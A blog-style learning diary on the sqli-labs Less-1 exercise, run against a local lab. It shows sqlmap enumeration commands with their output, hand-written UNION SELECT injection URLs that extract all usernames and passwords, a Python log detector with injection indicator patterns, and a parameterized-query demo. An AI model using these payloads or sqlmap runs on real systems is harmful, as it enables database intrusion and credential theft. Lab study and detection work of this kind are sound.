sqli-labs Learning Diary from Scratch (2)

  Well, this time there is a very handy tool, SQLMAP. The videos I watched used other software, which I don't know how to use, so I substituted SQLMAP and used it to enumerate the data.

  Prerequisite knowledge

   The group_concat() function.

   When learning on a platform you set up yourself, you can test by hand, but as a beginner how am I supposed to construct the statements? That is where SQLMAP's automated testing comes in. It has a verbosity level setting, -v3, which shows some injection parameters; the default, -v1, shows basically just the important information.

  Below are some SQLMAP usages and the data collected. Other tools could of course be used as well; I just don't know them.

python sqlmap.py -u http://localhost/sqli-labs/Less-1/?id=1 -v3    (3 shows the injected payload; other levels can be used too)
sqlmap -u http://localhost/sqli-labs/Less-1/?id=1 --dbs
Then it produced a pile of database information:
available databases [9]:
[*] cdcol
[*] data
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] security
[*] test
[*] webauth
I only know that these are databases; the rest I don't really understand. I still need to brush up on database knowledge.
Next, find the tables inside the database:
python sqlmap.py -u http://localhost/sqli-labs/Less-1/?id=1 -v3 -D security --tables
The data is as follows:
Database: security
[4 tables]
+----------+
| emails   |
| referers |
| uagents  |
| users    |
+----------+

python sqlmap.py -u http://localhost/sqli-labs/Less-1/?id=1 -D security -T users --columns
The data is in the table below:
Database: security
Table: users
[3 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(3)      |
| password | varchar(20) |
| username | varchar(20) |
+----------+-------------+

python sqlmap.py -u http://localhost/sqli-labs/Less-1/?id=1 -D security -T emails --columns
The data is in the table below:
Database: security
Table: emails
[2 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| email_id | varchar(30) |
| id       | int(3)      |
+----------+-------------+

python sqlmap.py -u http://localhost/sqli-labs/Less-1/?id=1 -D information_schema --tables
The data is as follows:
Database: information_schema
[59 tables]
+---------------------------------------+
| CHARACTER_SETS                        |
| COLLATIONS                            |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS                               |
| COLUMN_PRIVILEGES                     |
| ENGINES                               |
| EVENTS                                |
| FILES                                 |
| GLOBAL_STATUS                         |
| GLOBAL_VARIABLES                      |
| INNODB_BUFFER_PAGE                    |
| INNODB_BUFFER_PAGE_LRU                |
| INNODB_BUFFER_POOL_STATS              |
| INNODB_CMP                            |
| INNODB_CMPMEM                         |
| INNODB_CMPMEM_RESET                   |
| INNODB_CMP_PER_INDEX                  |
| INNODB_CMP_PER_INDEX_RESET            |
| INNODB_CMP_RESET                      |
| INNODB_FT_BEING_DELETED               |
| INNODB_FT_CONFIG                      |
| INNODB_FT_DEFAULT_STOPWORD            |
| INNODB_FT_DELETED                     |
| INNODB_FT_INDEX_CACHE                 |
| INNODB_FT_INDEX_TABLE                 |
| INNODB_LOCKS                          |
| INNODB_LOCK_WAITS                     |
| INNODB_METRICS                        |
| INNODB_SYS_COLUMNS                    |
| INNODB_SYS_DATAFILES                  |
| INNODB_SYS_FIELDS                     |
| INNODB_SYS_FOREIGN                    |
| INNODB_SYS_FOREIGN_COLS               |
| INNODB_SYS_INDEXES                    |
| INNODB_SYS_TABLES                     |
| INNODB_SYS_TABLESPACES                |
| INNODB_SYS_TABLESTATS                 |
| INNODB_TRX                            |
| KEY_COLUMN_USAGE                      |
| OPTIMIZER_TRACE                       |
| PARAMETERS                            |
| PARTITIONS                            |
| PLUGINS                               |
| PROCESSLIST                           |
| PROFILING                             |
| REFERENTIAL_CONSTRAINTS               |
| ROUTINES                              |
| SCHEMATA                              |
| SCHEMA_PRIVILEGES                     |
| SESSION_STATUS                        |
| SESSION_VARIABLES                     |
| STATISTICS                            |
| TABLES                                |
| TABLESPACES                           |
| TABLE_CONSTRAINTS                     |
| TABLE_PRIVILEGES                      |
| TRIGGERS                              |
| USER_PRIVILEGES                       |
| VIEWS                                 |
+---------------------------------------+

python sqlmap.py -u http://localhost/sqli-labs/Less-1/?id=1 -D information_schema -T TABLES --columns
The data is as follows:
Database: information_schema
Table: TABLES
[21 columns]
+-----------------+---------------------+
| Column          | Type                |
+-----------------+---------------------+
| VERSION         | bigint(21) unsigned |
| AUTO_INCREMENT  | bigint(21) unsigned |
| AVG_ROW_LENGTH  | bigint(21) unsigned |
| CHECK_TIME      | datetime            |
| CHECKSUM        | bigint(21) unsigned |
| CREATE_OPTIONS  | varchar(255)        |
| CREATE_TIME     | datetime            |
| DATA_FREE       | bigint(21) unsigned |
| DATA_LENGTH     | bigint(21) unsigned |
| ENGINE          | varchar(64)         |
| INDEX_LENGTH    | bigint(21) unsigned |
| MAX_DATA_LENGTH | bigint(21) unsigned |
| ROW_FORMAT      | varchar(10)         |
| TABLE_CATALOG   | varchar(512)        |
| TABLE_COLLATION | varchar(32)         |
| TABLE_COMMENT   | varchar(2048)       |
| TABLE_NAME      | varchar(64)         |
| TABLE_ROWS      | bigint(21) unsigned |
| TABLE_SCHEMA    | varchar(64)         |
| TABLE_TYPE      | varchar(64)         |
| UPDATE_TIME     | datetime            |
+-----------------+---------------------+
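Seen from the defending side, the enumeration that the sqlmap runs above perform leaves characteristic traces in the web server's access log: many requests to the same parameter from one address, a distinctive User-Agent, and query strings carrying UNION/SELECT, information_schema and group_concat. The following is an added example that is not part of the original diary and not sqlmap's code: a small Python detector that URL-decodes each request's query string, applies a handful of indicator patterns, and counts hits per source address. The log lines are constructed samples in Combined Log Format, and the sqlmap User-Agent string and version in them are likewise constructed.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus, urlsplit

# Combined Log Format: ip ident user [time] "METHOD target proto" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "([^"]*)" "([^"]*)"'
)

# Indicator patterns for the request shapes seen in the Less-1 walkthrough.
# They are applied to the URL-decoded query string, so %27 and --+ are already ' and "-- ".
INDICATORS = {
    "union_select": re.compile(r"\bunion\b.*\bselect\b", re.I | re.S),
    "information_schema": re.compile(r"\binformation_schema\b", re.I),
    "group_concat": re.compile(r"\bgroup_concat\s*\(", re.I),
    "quote_then_comment": re.compile(r"'.*(--|#)", re.S),   # quote breakout ended by a comment
    "boolean_probe": re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+", re.I),  # e.g. AND 1=1
}
# sqlmap identifies itself unless told otherwise; matching the prefix is enough.
SQLMAP_UA = re.compile(r"^sqlmap/", re.I)

# Constructed sample log (not from the original page): 10.0.0.5 is an ordinary visitor,
# 10.0.0.9 sends a probe and two of the UNION payloads shown in the diary.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /sqli-labs/Less-1/?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /sqli-labs/Less-1/?id=1%20AND%201%3D1 HTTP/1.1" 200 512 "-" "sqlmap/1.7 (https://sqlmap.org)"
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /sqli-labs/Less-1/?id=-1%27union%20select%201,group_concat(username),group_concat(password)%20from%20users%20--+ HTTP/1.1" 200 640 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /sqli-labs/Less-1/?id=111%27union%20select%201,table_name,3%20from%20information_schema.tables%20where%20table_schema=database()%20limit%201,1--+ HTTP/1.1" 200 600 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Split one access-log line into fields; returns None for lines that do not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, method, target, status, referer, ua = m.groups()
    # unquote_plus turns '+' into a space, which is what turns the trailing "--+" into a valid comment.
    query = unquote_plus(urlsplit(target).query)
    return {"ip": ip, "time": ts, "method": method, "target": target,
            "query": query, "status": int(status), "ua": ua}


def classify(entry):
    """Return the names of every indicator that fires on one parsed request."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(entry["query"])]
    if SQLMAP_UA.search(entry["ua"]):
        hits.append("sqlmap_user_agent")
    return hits


def analyze_log(text):
    """Run the indicators over a whole log and keep only the requests that fired at least one."""
    findings = []
    for line in text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        hits = classify(entry)
        if hits:
            findings.append({"ip": entry["ip"], "time": entry["time"],
                             "query": entry["query"], "indicators": hits})
    return findings


def count_by_ip(findings):
    """Aggregate flagged requests per source address; a burst from one IP is the enumeration signature."""
    return Counter(f["ip"] for f in findings)


if __name__ == "__main__":
    found = analyze_log(SAMPLE_LOG)
    for f in found:
        print(f["ip"], f["time"], f["indicators"], "|", f["query"])
    print("flagged requests per source:", dict(count_by_ip(found)))
```

The same patterns can be applied inside the application itself (on the decoded parameter value) to reject a request before it reaches the database, but that is a secondary control; the primary fix is the parameterized query, since a pattern list will never enumerate every encoding an attacker can use.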

One more injection command to add:

python sqlmap.py -u http://localhost/sqli-labs/Less-1/?id=1 -D information_schema -T tables -C table_name --dump    // this dumps what is inside the table; it seems it can also be restricted, I'll keep learning and add to this later
With that, we know the contents of this database fairly clearly, and as a beginner I can construct statements by looking at it.
http://localhost/sqli-labs/Less-1/?id=111'union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 1,1--+    (try 1, 2, 3, 4 for the first number of the limit) // observe the result
Below I continue with some statements constructed from the pile of database data above.
http://localhost/sqli-labs/Less-1/?id=111'union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+    // then everything is displayed together

http://localhost/sqli-labs/Less-1/?id=111'union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+    // this shows what is inside USERS

http://localhost/sqli-labs/Less-1/?id=-1'union select 1,group_concat(username),3 from users --+    // this puts the username data for each id together

http://localhost/sqli-labs/Less-1/?id=-1'union select 1,group_concat(username),group_concat(password) from users --+    // this is the upgraded version, with passwords

Then compare and analyze...
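To make clear why the statements above work and what stops them, here is an added example that is not part of the original diary and not sqli-labs' code. It models the Less-1 lookup in Python with sqlite3 standing in for MySQL: a `users` table with the three columns the sqlmap output listed (filled with constructed rows, not the lab's real data), a lookup that embeds the id parameter inside quotes by string concatenation, and the same lookup as a parameterized query. The exact query shape is an assumption based on the quote breakout the payloads rely on. The final group_concat payload from the diary, URL-decoded the way the server would decode it, is fed to both.

```python
import sqlite3
from urllib.parse import unquote_plus

# The last payload from the diary, as it appears in the URL; unquote_plus turns "--+" into "-- ".
PAYLOAD = unquote_plus(
    "-1%27union%20select%201,group_concat(username),group_concat(password)%20from%20users%20--+"
)


def make_db():
    """Constructed stand-in for security.users (id, username, password); rows are made up."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "alice", "pw-alice-1"), (2, "bob", "pw-bob-2")],
    )
    conn.commit()
    return conn


def vulnerable_lookup(conn, raw_id):
    """ASSUMED Less-1 shape: the parameter is pasted between single quotes, so a quote ends the
    literal, 'union select' appends attacker-chosen columns, and '-- ' comments out the LIMIT."""
    sql = f"SELECT id, username, password FROM users WHERE id='{raw_id}' LIMIT 0,1"
    return conn.execute(sql).fetchone()


def safe_lookup(conn, raw_id):
    """Parameterized form: the whole input is bound as one value and compared against id, never parsed as SQL."""
    sql = "SELECT id, username, password FROM users WHERE id=? LIMIT 0,1"
    return conn.execute(sql, (raw_id,)).fetchone()


def compare(conn, raw_id):
    """Run both lookups on the same input so the difference is visible side by side."""
    return {"vulnerable": vulnerable_lookup(conn, raw_id), "safe": safe_lookup(conn, raw_id)}


if __name__ == "__main__":
    db = make_db()
    print("normal id=1      :", compare(db, "1"))
    # With the payload, the vulnerable path returns one row whose 2nd and 3rd columns are
    # every username and every password joined by commas (that is what group_concat does);
    # the safe path returns None because no id equals the payload string.
    print("diary payload    :", compare(db, PAYLOAD))
```

The row the vulnerable path returns is not a user record at all; it is the union's second SELECT, where group_concat has collapsed the whole table into two comma-separated strings, which is exactly why the diary's last statement shows all usernames and passwords at once. The parameterized version gives the database driver the value separately from the statement, so the quote and the comment marker are just characters inside a string that matches no id.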
